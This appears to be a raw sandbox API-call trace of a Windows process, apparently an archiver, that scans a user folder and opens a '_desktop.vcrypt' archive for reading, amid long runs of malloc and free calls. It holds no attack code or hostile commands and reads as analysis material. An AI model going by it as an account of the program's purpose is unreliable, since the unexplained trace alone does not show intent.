(_Block=0xb5f4a0) [0070.521] free (_Block=0xb5f3e0) [0070.521] free (_Block=0xb5d878) [0070.521] free (_Block=0xb5f410) [0070.521] free (_Block=0xb5f3f8) [0070.521] free (_Block=0xb5f3c8) [0070.521] free (_Block=0xb5f3b0) [0070.521] free (_Block=0xb5d838) [0070.521] free (_Block=0xb5f398) [0070.521] free (_Block=0xb5d788) [0070.522] free (_Block=0xb5f350) [0070.522] free (_Block=0xb5f428) [0070.522] free (_Block=0xb5d768) [0070.522] free (_Block=0xb5f368) [0070.522] free (_Block=0xb5f338) [0070.522] free (_Block=0xb5f320) [0070.522] free (_Block=0xb5f308) [0070.522] free (_Block=0xb5f2d8) [0070.522] free (_Block=0xb5d758) [0070.522] free (_Block=0xb52cb0) [0070.522] free (_Block=0xb5f380) [0070.522] free (_Block=0xb5f288) [0070.522] free (_Block=0xb5f258) [0070.522] malloc (_Size=0x8) returned 0xb5d758 [0070.522] malloc (_Size=0x4) returned 0xb5d768 [0070.522] free (_Block=0x0) [0070.523] malloc (_Size=0x3) returned 0xb5d788 [0070.523] malloc (_Size=0x3c) returned 0xb5f258 [0070.523] malloc (_Size=0xc) returned 0xb5f380 [0070.523] malloc (_Size=0x10) returned 0xb5f308 [0070.523] malloc (_Size=0x18) returned 0xb5f750 [0070.523] malloc (_Size=0x8) returned 0xb5d838 [0070.523] malloc (_Size=0x2) returned 0xb5d878 [0070.523] malloc (_Size=0x18) returned 0xb5f770 [0070.523] malloc (_Size=0xc) returned 0xb5f320 [0070.523] malloc (_Size=0x2) returned 0xb5d778 [0070.523] malloc (_Size=0x18) returned 0xb5f790 [0070.523] malloc (_Size=0xa) returned 0xb5f338 [0070.523] malloc (_Size=0xa) returned 0xb5f368 [0070.523] malloc (_Size=0x18) returned 0xb5f7b0 [0070.523] malloc (_Size=0x8) returned 0xb5d888 [0070.523] malloc (_Size=0xa) returned 0xb5f428 [0070.523] malloc (_Size=0x4) returned 0xb5d898 [0070.523] malloc (_Size=0x8) returned 0xb5d8a8 [0070.523] malloc (_Size=0x3) returned 0xb5d8b8 [0070.523] malloc (_Size=0x4) returned 0xb5d8c8 [0070.523] free (_Block=0x0) [0070.523] free (_Block=0xb5d788) [0070.523] free (_Block=0xb5d758) [0070.523] free (_Block=0xb5d768) [0070.524] free (_Block=0xb5f458) [0070.524] free (_Block=0xb5d868) [0070.524] free (_Block=0xb5f730) [0070.524] free (_Block=0xb5f488) [0070.524] free (_Block=0xb5f470) [0070.524] free (_Block=0xb5f710) [0070.524] free (_Block=0xb5d848) [0070.524] free (_Block=0xb5f440) [0070.524] free (_Block=0xb5f6f0) [0070.524] free (_Block=0xb5d858) [0070.524] free (_Block=0xb5d798) [0070.524] free (_Block=0xb5f2b0) [0070.524] free (_Block=0xb5f4b8) [0070.524] free (_Block=0xb513c8) [0070.524] malloc (_Size=0x8) returned 0xb5d798 [0070.524] malloc (_Size=0xa) returned 0xb5f4b8 [0070.524] free (_Block=0xb5d798) [0070.524] malloc (_Size=0x8) returned 0xb5d798 [0070.524] malloc (_Size=0x8) returned 0xb5d858 [0070.524] malloc (_Size=0x28) returned 0xb5f2a0 [0070.524] free (_Block=0xb5d798) [0070.524] malloc (_Size=0x26) returned 0xb5f6f0 [0070.524] free (_Block=0xb5d858) [0070.524] malloc (_Size=0x8) returned 0xb5d858 [0070.524] malloc (_Size=0xc) returned 0xb5f440 [0070.524] malloc (_Size=0x6) returned 0xb5d798 [0070.524] malloc (_Size=0x4) returned 0xb5d848 [0070.524] free (_Block=0x0) [0070.525] malloc (_Size=0x20) returned 0xb5f720 [0070.525] free (_Block=0xb5d858) [0070.525] malloc (_Size=0xc) returned 0xb5f470 [0070.525] malloc (_Size=0xa) returned 0xb5f488 [0070.525] malloc (_Size=0x8) returned 0xb5d858 [0070.525] free (_Block=0xb5d848) [0070.525] malloc (_Size=0xc) returned 0xb5f458 [0070.525] malloc (_Size=0x8) returned 0xb5d848 [0070.525] malloc (_Size=0xc) returned 0xb5f350 [0070.525] free (_Block=0xb5d858) [0070.525] malloc (_Size=0xc) returned 0xb5f398 [0070.525] malloc (_Size=0x8) returned 0xb5d858 [0070.525] malloc (_Size=0x10) returned 0xb5f3b0 [0070.525] free (_Block=0xb5f350) [0070.525] malloc (_Size=0xc) returned 0xb5f350 [0070.525] malloc (_Size=0x8) returned 0xb5d868 [0070.525] malloc (_Size=0x18) returned 0xb5f2d0 [0070.525] free (_Block=0xb5f3b0) [0070.525] free (_Block=0xb5f720) [0070.526] malloc (_Size=0x8) returned 0xb5d768 [0070.526] malloc (_Size=0xc) returned 0xb5f3b0 [0070.526] malloc (_Size=0x4) returned 0xb5d758 [0070.526] malloc (_Size=0x4) returned 0xb5d788 [0070.526] free (_Block=0x0) [0070.526] malloc (_Size=0xc) returned 0xb5f3c8 [0070.526] malloc (_Size=0x4) returned 0xb5d8d8 [0070.526] malloc (_Size=0x8) returned 0xb5d8e8 [0070.526] free (_Block=0xb5d788) [0070.526] malloc (_Size=0x20) returned 0xb5f720 [0070.526] free (_Block=0xb5d768) [0070.526] malloc (_Size=0xc) returned 0xb5f3f8 [0070.526] malloc (_Size=0xa) returned 0xb5f410 [0070.526] malloc (_Size=0xc) returned 0xb5f3e0 [0070.526] free (_Block=0xb5d8e8) [0070.526] malloc (_Size=0xc) returned 0xb5f4a0 [0070.526] malloc (_Size=0xa) returned 0xb5f4d0 [0070.526] malloc (_Size=0x10) returned 0xb5f4e8 [0070.526] free (_Block=0xb5f3e0) [0070.526] malloc (_Size=0xc) returned 0xb5f3e0 [0070.526] malloc (_Size=0xa) returned 0xb5f500 [0070.527] malloc (_Size=0x18) returned 0xb5f7d0 [0070.527] free (_Block=0xb5f4e8) [0070.527] free (_Block=0xb5f720) [0070.527] malloc (_Size=0x8) returned 0xb5d8e8 [0070.527] malloc (_Size=0x8) returned 0xb5d768 [0070.527] wcscmp (_String1="*", _String2="*") returned 0 [0070.527] malloc (_Size=0x18) returned 0xb5f720 [0070.527] malloc (_Size=0x6) returned 0xb5d788 [0070.527] malloc (_Size=0x2) returned 0xb5d8f8 [0070.527] malloc (_Size=0x4) returned 0xb5d908 [0070.527] free (_Block=0x0) [0070.527] free (_Block=0xb5d768) [0070.527] free (_Block=0xb5d8e8) [0070.527] malloc (_Size=0x8) returned 0xb5d8e8 [0070.527] malloc (_Size=0x8) returned 0xb5d768 [0070.527] malloc (_Size=0xa) returned 0xb5f4e8 [0070.527] free (_Block=0xb5d8e8) [0070.527] wcscmp (_String1="*", _String2="*") returned 0 [0070.527] malloc (_Size=0x18) returned 0xb5f7f0 [0070.528] malloc (_Size=0xa) returned 0xb5f518 [0070.528] malloc (_Size=0x2) returned 0xb5d8e8 [0070.528] malloc (_Size=0x8) returned 0xb5d918 [0070.528] free (_Block=0xb5d908) [0070.528] free (_Block=0xb5d768) [0070.528] free (_Block=0xb5f4e8) [0070.528] malloc (_Size=0x8) returned 0xb5d768 [0070.528] malloc (_Size=0x8) returned 0xb5d908 [0070.528] malloc (_Size=0xa) returned 0xb5f4e8 [0070.528] free (_Block=0xb5d908) [0070.528] wcscmp (_String1=".tar", _String2="*") returned 1 [0070.528] malloc (_Size=0x18) returned 0xb5f810 [0070.528] malloc (_Size=0x8) returned 0xb5d908 [0070.528] malloc (_Size=0xa) returned 0xb5f530 [0070.528] malloc (_Size=0xc) returned 0xb5f548 [0070.528] free (_Block=0xb5d918) [0070.528] free (_Block=0xb5f4e8) [0070.528] free (_Block=0xb5d768) [0070.528] malloc (_Size=0x8) returned 0xb5d768 [0070.528] malloc (_Size=0x8) returned 0xb5d918 [0070.528] malloc (_Size=0xa) returned 0xb5f4e8 [0070.529] free (_Block=0xb5d918) [0070.529] wcscmp (_String1=".tar", _String2="*") returned 1 [0070.529] malloc (_Size=0x18) returned 0xb5f830 [0070.529] malloc (_Size=0x8) returned 0xb5d918 [0070.529] malloc (_Size=0xa) returned 0xb5f560 [0070.529] malloc (_Size=0x10) returned 0xb5f578 [0070.529] free (_Block=0xb5f548) [0070.529] free (_Block=0xb5f4e8) [0070.529] free (_Block=0xb5d768) [0070.529] malloc (_Size=0x8) returned 0xb5d768 [0070.529] malloc (_Size=0x8) returned 0xb5d928 [0070.529] malloc (_Size=0xa) returned 0xb5f4e8 [0070.529] free (_Block=0xb5d928) [0070.529] wcscmp (_String1=".tar", _String2="*") returned 1 [0070.529] malloc (_Size=0x18) returned 0xb5f850 [0070.529] malloc (_Size=0x8) returned 0xb5d928 [0070.529] malloc (_Size=0xa) returned 0xb5f548 [0070.529] malloc (_Size=0x18) returned 0xb5f870 [0070.529] free (_Block=0xb5f578) [0070.530] free (_Block=0xb5f4e8) [0070.530] free (_Block=0xb5d768) [0070.530] free (_Block=0xb5f500) [0070.530] free (_Block=0xb5f3e0) [0070.530] free (_Block=0xb5f4d0) [0070.530] free (_Block=0xb5f4a0) [0070.530] free (_Block=0xb5f410) [0070.530] free (_Block=0xb5f3f8) [0070.530] free (_Block=0xb5d8d8) [0070.530] free (_Block=0xb5f3c8) [0070.530] free (_Block=0xb5d758) [0070.530] free (_Block=0xb5f3b0) [0070.530] free (_Block=0xb5f7d0) [0070.530] free (_Block=0xb5d868) [0070.530] free (_Block=0xb5f350) [0070.530] free (_Block=0xb5d858) [0070.530] free (_Block=0xb5f398) [0070.530] free (_Block=0xb5d848) [0070.530] free (_Block=0xb5f458) [0070.530] free (_Block=0xb5f488) [0070.530] free (_Block=0xb5f470) [0070.530] free (_Block=0xb5d798) [0070.530] free (_Block=0xb5f440) [0070.531] free (_Block=0xb5f2d0) [0070.531] free (_Block=0xb5f6f0) [0070.531] free (_Block=0xb5f2a0) [0070.531] malloc (_Size=0x8) returned 0xb5d798 [0070.531] malloc (_Size=0x4) returned 0xb5d848 [0070.531] free (_Block=0x0) [0070.531] malloc (_Size=0x3) returned 0xb5d858 [0070.531] malloc (_Size=0x3c) returned 0xb5f2a0 [0070.531] malloc (_Size=0xa) returned 0xb5f440 [0070.531] malloc (_Size=0x14) returned 0xb5f7d0 [0070.531] malloc (_Size=0x18) returned 0xb5f6f0 [0070.531] malloc (_Size=0x6) returned 0xb5d868 [0070.531] malloc (_Size=0x2) returned 0xb5d758 [0070.531] malloc (_Size=0x18) returned 0xb5f890 [0070.531] malloc (_Size=0xa) returned 0xb5f470 [0070.531] malloc (_Size=0x2) returned 0xb5d8d8 [0070.531] malloc (_Size=0x18) returned 0x780060 [0070.532] malloc (_Size=0x8) returned 0xb5d768 [0070.532] malloc (_Size=0xa) returned 0xb5f488 [0070.532] malloc (_Size=0x18) returned 0x780080 [0070.532] malloc (_Size=0x8) returned 0xb5d938 [0070.532] malloc (_Size=0xa) returned 0xb5f458 [0070.532] malloc (_Size=0x18) returned 0x7800a0 [0070.532] malloc (_Size=0x8) returned 0xb5d948 [0070.532] malloc (_Size=0xa) returned 0xb5f398 [0070.532] malloc (_Size=0x4) returned 0xb5d958 [0070.533] malloc (_Size=0x8) returned 0xb5d968 [0070.533] malloc (_Size=0x3) returned 0xb5d978 [0070.533] malloc (_Size=0x8) returned 0xb5d988 [0070.533] free (_Block=0xb5d8c8) [0070.533] free (_Block=0xb5d858) [0070.533] free (_Block=0xb5d798) [0070.533] free (_Block=0xb5d848) [0070.533] free (_Block=0xb5f548) [0070.533] free (_Block=0xb5d928) [0070.533] free (_Block=0xb5f850) [0070.533] free (_Block=0xb5f560) [0070.533] free (_Block=0xb5d918) [0070.533] free (_Block=0xb5f830) [0070.533] free (_Block=0xb5f530) [0070.533] free (_Block=0xb5d908) [0070.533] free (_Block=0xb5f810) [0070.533] free (_Block=0xb5d8e8) [0070.533] free (_Block=0xb5f518) [0070.534] free (_Block=0xb5f7f0) [0070.534] free (_Block=0xb5d8f8) [0070.534] free (_Block=0xb5d788) [0070.534] free (_Block=0xb5f720) [0070.534] free (_Block=0xb5f870) [0070.534] free (_Block=0xb5f4b8) [0070.534] malloc (_Size=0x8) returned 0xb5d788 [0070.534] malloc (_Size=0xa) returned 0xb5f4b8 [0070.534] free (_Block=0xb5d788) [0070.534] malloc (_Size=0x8) returned 0xb5d788 [0070.534] malloc (_Size=0x8) returned 0xb5d8f8 [0070.534] malloc (_Size=0xa) returned 0xb5f518 [0070.534] free (_Block=0xb5d788) [0070.534] malloc (_Size=0x8) returned 0xb5d788 [0070.534] malloc (_Size=0x20) returned 0xb5f710 [0070.534] free (_Block=0xb5d788) [0070.534] malloc (_Size=0xc) returned 0xb5f530 [0070.534] malloc (_Size=0xa) returned 0xb5f560 [0070.534] malloc (_Size=0x4) returned 0xb5d788 [0070.534] free (_Block=0x0) [0070.534] free (_Block=0xb5f710) [0070.535] malloc (_Size=0x8) returned 0xb5d8e8 [0070.535] free (_Block=0xb5d8e8) [0070.535] malloc (_Size=0x8) returned 0xb5d8e8 [0070.535] malloc (_Size=0x8) returned 0xb5d908 [0070.535] malloc (_Size=0xa) returned 0xb5f548 [0070.535] free (_Block=0xb5d8e8) [0070.535] malloc (_Size=0x18) returned 0x7800c0 [0070.535] malloc (_Size=0xa) returned 0xb5f350 [0070.535] malloc (_Size=0x2) returned 0xb5d8e8 [0070.535] malloc (_Size=0x4) returned 0xb5d918 [0070.535] free (_Block=0x0) [0070.535] free (_Block=0xb5d908) [0070.535] free (_Block=0xb5f548) [0070.535] free (_Block=0x0) [0070.535] free (_Block=0xb5f560) [0070.535] free (_Block=0xb5f530) [0070.535] free (_Block=0xb5d788) [0070.535] free (_Block=0xb5d8f8) [0070.535] free (_Block=0xb5f518) [0070.535] malloc (_Size=0x8) returned 0xb5d8f8 [0070.535] malloc (_Size=0x4) returned 0xb5d788 [0070.535] free (_Block=0x0) [0070.536] malloc (_Size=0x3c) returned 0xb5f7f0 [0070.536] malloc (_Size=0xa) returned 0xb5f518 [0070.536] malloc (_Size=0x4) returned 0xb5d908 [0070.536] malloc (_Size=0x18) returned 0x7800e0 [0070.536] malloc (_Size=0xa) returned 0xb5f530 [0070.536] malloc (_Size=0x2) returned 0xb5d928 [0070.536] malloc (_Size=0x4) returned 0xb5d848 [0070.536] malloc (_Size=0x8) returned 0xb5d798 [0070.536] malloc (_Size=0xc) returned 0xb5f560 [0070.536] free (_Block=0xb5d988) [0070.536] free (_Block=0x0) [0070.536] free (_Block=0xb5d8f8) [0070.536] free (_Block=0xb5d788) [0070.536] free (_Block=0xb5d8e8) [0070.536] free (_Block=0xb5f350) [0070.536] free (_Block=0x7800c0) [0070.536] free (_Block=0xb5d918) [0070.536] free (_Block=0xb5f4b8) [0070.536] malloc (_Size=0x8) returned 0xb5d918 [0070.536] wcscmp (_String1="*", _String2="*") returned 0 [0070.537] wcscmp (_String1=".tar", _String2="*") returned 1 [0070.537] wcscmp (_String1="Users", _String2="..") returned 1 [0070.537] wcscmp (_String1="Users", _String2=".") returned 1 [0070.538] wcscmp (_String1="5p5NrGJn0jS HALPmcxz", _String2="..") returned 1 [0070.538] wcscmp (_String1="5p5NrGJn0jS HALPmcxz", _String2=".") returned 1 [0070.538] wcscmp (_String1="Desktop", _String2="..") returned 1 [0070.538] wcscmp (_String1="Desktop", _String2=".") returned 1 [0070.538] wcscmp (_String1="*", _String2="..") returned -1 [0070.538] wcscmp (_String1="*", _String2=".") returned -1 [0070.538] free (_Block=0x780b40) [0070.538] free (_Block=0xb5f668) [0070.538] free (_Block=0xb51230) [0070.538] free (_Block=0xb528a8) [0070.538] malloc (_Size=0x8) returned 0x780b30 [0070.538] malloc (_Size=0x8) returned 0x780b50 [0070.538] malloc (_Size=0x8) returned 0x780b70 [0070.538] malloc (_Size=0x8) returned 0x780bb0 [0070.539] malloc (_Size=0x6) returned 0x780bc0 [0070.539] free (_Block=0x780bc0) [0070.539] malloc (_Size=0x6) returned 0x780bc0 [0070.539] malloc (_Size=0x84) returned 0x780c48 [0070.539] free (_Block=0xb52b00) [0070.539] malloc (_Size=0x3e) returned 0xb51230 [0070.539] free (_Block=0xb52b10) [0070.539] malloc (_Size=0x48) returned 0xb5ff88 [0070.539] free (_Block=0xb52b20) [0070.539] malloc (_Size=0xe) returned 0xb5f6c8 [0070.539] free (_Block=0xb5f6c8) [0070.539] malloc (_Size=0x6) returned 0x780bd0 [0070.539] free (_Block=0xb5d7e8) [0070.539] malloc (_Size=0x6) returned 0xb5d7e8 [0070.539] free (_Block=0xb5d7f8) [0070.539] free (_Block=0x780bc0) [0070.539] free (_Block=0x780bb0) [0070.539] malloc (_Size=0x84) returned 0x780d88 [0070.539] malloc (_Size=0x84) returned 0x780e18 [0070.539] free (_Block=0x780d88) [0070.539] malloc (_Size=0x8) returned 0x780bb0 [0070.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpFindFileData=0x5aef68 | out: lpFindFileData=0x5aef68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a8020, ftCreationTime.dwHighDateTime=0x1d62400, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3dbba60, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x2a91f8, dwReserved0=0x6a000a, dwReserved1=0x9, cFileName="5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cAlternateFileName="5P5NRG~1.VCR")) returned 0x8e7b70 [0070.540] malloc (_Size=0x48) returned 0x780d88 [0070.540] free (_Block=0x780bb0) [0070.540] FindClose (in: hFindFile=0x8e7b70 | out: hFindFile=0x8e7b70) returned 1 [0070.540] malloc (_Size=0x20) returned 0xb528a8 [0070.540] malloc (_Size=0x4) returned 0x780bb0 [0070.540] free (_Block=0x0) [0070.540] malloc (_Size=0x8) returned 0x780bc0 [0070.540] malloc (_Size=0x84) returned 0x780ea8 [0070.540] free (_Block=0x780bc0) [0070.541] fputs (in: _Str="Open archive: ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0070.542] malloc (_Size=0x4) returned 0x780bc0 [0070.542] malloc (_Size=0x84) returned 0x780f38 [0070.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0070.542] malloc (_Size=0x42) returned 0x780fc8 [0070.542] free (_Block=0x780bc0) [0070.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cchWideChar=65, lpMultiByteStr=0x780fc8, cbMultiByte=65, lpDefaultChar=0x5af1fc, lpUsedDefaultChar=0x5af1e8 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpUsedDefaultChar=0x5af1e8) returned 65 [0070.542] free (_Block=0x780f38) [0070.542] fputs (in: _Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", _File=0x77032920 | out: _File=0x77032920) returned 0 [0070.543] free (_Block=0x780fc8) [0070.543] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0070.545] malloc (_Size=0x98) returned 0x780f38 [0070.545] malloc (_Size=0x8) returned 0x780bc0 [0070.545] malloc (_Size=0x8) returned 0x780be0 [0070.545] malloc (_Size=0x8) returned 0x780bf0 [0070.545] malloc (_Size=0x8) returned 0x780c00 [0070.545] malloc (_Size=0x8) returned 0x780c10 [0070.545] malloc (_Size=0x84) returned 0x780fd8 [0070.545] free (_Block=0x780c00) [0070.545] malloc (_Size=0x48) returned 0x781068 [0070.545] free (_Block=0x780c10) [0070.545] malloc (_Size=0x3e) returned 0x7810b8 [0070.545] free (_Block=0x780bc0) [0070.546] malloc (_Size=0x84) returned 0x781100 [0070.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpFindFileData=0x5aeed0 | out: lpFindFileData=0x5aeed0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a8020, ftCreationTime.dwHighDateTime=0x1d62400, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3dbba60, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x2a91f8, dwReserved0=0x23, dwReserved1=0x5aef94, cFileName="5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cAlternateFileName="5P5NRG~1.VCR")) returned 0x8e7b70 [0070.546] malloc (_Size=0x48) returned 0x781190 [0070.546] free (_Block=0x780be0) [0070.546] FindClose (in: hFindFile=0x8e7b70 | out: hFindFile=0x8e7b70) returned 1 [0070.547] free (_Block=0x781100) [0070.547] malloc (_Size=0x8) returned 0x780be0 [0070.547] malloc (_Size=0x8) returned 0x780bc0 [0070.547] malloc (_Size=0x8) returned 0x780c10 [0070.547] malloc (_Size=0x8) returned 0x780c00 [0070.547] malloc (_Size=0x8) returned 0x780c20 [0070.547] malloc (_Size=0x8) returned 0x780c30 [0070.547] malloc (_Size=0x8) returned 0xb5fb70 [0070.547] malloc (_Size=0x84) returned 0x781100 [0070.547] free (_Block=0x780c30) [0070.547] malloc (_Size=0x84) returned 0x7811e0 [0070.547] free (_Block=0x780c20) [0070.547] malloc (_Size=0x58) returned 0x781270 [0070.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\5p5nrgjn0js halpmcxz_desktop.vcrypt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0070.548] malloc (_Size=0x48) returned 0x7812d0 [0070.548] malloc (_Size=0x8) returned 0x780c20 [0070.548] malloc (_Size=0xe) returned 0xb5f6c8 [0070.548] free (_Block=0x780c20) [0070.548] malloc (_Size=0xa) returned 0xb5f410 [0070.548] malloc (_Size=0x4) returned 0x780c20 [0070.548] free (_Block=0x0) [0070.548] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x5aeb84*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5aeb84*=0) returned 0x2a91f8 [0070.548] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x5aeb84*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5aeb84*=0) returned 0x0 [0070.548] malloc (_Size=0xa) returned 0xb5f698 [0070.549] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x5aeb84*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5aeb84*=0) returned 0x0 [0070.549] malloc (_Size=0x210) returned 0x781320 [0070.549] GetCurrentProcess () returned 0xffffffff [0070.549] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x5aead8, lpSystemAffinityMask=0x5aeadc | out: lpProcessAffinityMask=0x5aead8, lpSystemAffinityMask=0x5aeadc) returned 1 [0070.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0070.550] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatusEx") returned 0x76d6d4c4 [0070.550] GlobalMemoryStatusEx (in: lpBuffer=0x5aea80 | out: lpBuffer=0x5aea80) returned 1 [0070.550] malloc (_Size=0x4) returned 0x780c30 [0070.550] malloc (_Size=0x8) returned 0xb5fb80 [0070.550] malloc (_Size=0x8) returned 0xb5fba0 [0070.551] malloc (_Size=0x14) returned 0x7800c0 [0070.551] malloc (_Size=0x6) returned 0xb5fbb0 [0070.551] malloc (_Size=0xc) returned 0xb5f6b0 [0070.551] malloc (_Size=0x6) returned 0xb5fb50 [0070.551] malloc (_Size=0x4) returned 0xb5fb90 [0070.551] free (_Block=0x0) [0070.551] free (_Block=0xb5fbb0) [0070.551] malloc (_Size=0x4) returned 0xb5fbb0 [0070.551] free (_Block=0x0) [0070.551] GetCurrentProcess () returned 0xffffffff [0070.551] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x5aeaa4, lpSystemAffinityMask=0x5aeaa8 | out: lpProcessAffinityMask=0x5aeaa4, lpSystemAffinityMask=0x5aeaa8) returned 1 [0070.552] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0070.552] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatusEx") returned 0x76d6d4c4 [0070.552] GlobalMemoryStatusEx (in: lpBuffer=0x5aea4c | out: lpBuffer=0x5aea4c) returned 1 [0070.552] malloc (_Size=0x6) returned 0xb5fbd0 [0070.552] malloc (_Size=0x6) returned 0xb5fbe0 [0070.552] malloc (_Size=0x6) returned 0xb5fbf0 [0070.552] free (_Block=0xb5fbf0) [0070.552] free (_Block=0xb5fbe0) [0070.552] free (_Block=0xb5fbd0) [0070.552] free (_Block=0xb5fbb0) [0070.552] free (_Block=0x7800c0) [0070.552] free (_Block=0xb5fb50) [0070.552] free (_Block=0xb5f6b0) [0070.553] free (_Block=0xb5fb90) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] free (_Block=0x0) [0071.382] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x5aeab4*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5aeab4*=0) returned 0x0 [0071.382] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x5aeab4*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x5aeab4*=0) returned 0x2a91f8 [0071.383] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x5aeab4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5aeab4*=0) returned 0x0 [0071.383] ReadFile (in: hFile=0x80, lpBuffer=0x5aeb68, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x5aea1c, lpOverlapped=0x0 | out: lpBuffer=0x5aeb68*, lpNumberOfBytesRead=0x5aea1c*=0x20, lpOverlapped=0x0) returned 1 [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] free (_Block=0x0) [0071.383] SetFilePointer (in: hFile=0x80, lDistanceToMove=2789811, lpDistanceToMoveHigh=0x5ae818*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5ae818*=0) returned 0x2a91d3 [0071.383] malloc (_Size=0x25) returned 0xb52b00 [0071.383] ReadFile (in: hFile=0x80, lpBuffer=0xb52b00, nNumberOfBytesToRead=0x25, lpNumberOfBytesRead=0x5ae7c4, lpOverlapped=0x0 | out: lpBuffer=0xb52b00*, lpNumberOfBytesRead=0x5ae7c4*=0x25, lpOverlapped=0x0) returned 1 [0071.383] free (_Block=0x0) [0071.383] malloc (_Size=0x10) returned 0xb5f6b0 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x8) returned 0xb5fb90 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x1) returned 0xb5fb50 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x8) returned 0xb5fbb0 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x8) returned 0xb5fbd0 [0071.384] malloc (_Size=0x8) returned 0xb5fbe0 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0xb) returned 0xb5f668 [0071.384] free (_Block=0x0) [0071.384] free (_Block=0x0) [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x8) returned 0xb5fbf0 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x1) returned 0xb5fc00 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x4) returned 0xb5fc10 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x4) returned 0xb5fc20 [0071.384] malloc (_Size=0x8) returned 0xb5fc30 [0071.384] free (_Block=0x0) [0071.384] malloc (_Size=0x8) returned 0xb5fb60 [0071.385] malloc (_Size=0x4) returned 0xb5fbc0 [0071.385] free (_Block=0x0) [0071.385] malloc (_Size=0xdfa) returned 0x781538 [0071.385] malloc (_Size=0x14) returned 0x7800c0 [0071.385] malloc (_Size=0x1c) returned 0x780dd8 [0071.385] malloc (_Size=0x5) returned 0xb5fc40 [0071.385] malloc (_Size=0x4) returned 0xb5fc70 [0071.385] free (_Block=0x0) [0071.385] free (_Block=0x0) [0071.385] malloc (_Size=0x4) returned 0xb5fc80 [0071.385] free (_Block=0x0) [0071.385] malloc (_Size=0x8) returned 0xb5fc90 [0071.385] free (_Block=0x0) [0071.385] malloc (_Size=0x4) returned 0xb5fca0 [0071.385] malloc (_Size=0x4) returned 0xb5fc50 [0071.385] free (_Block=0x0) 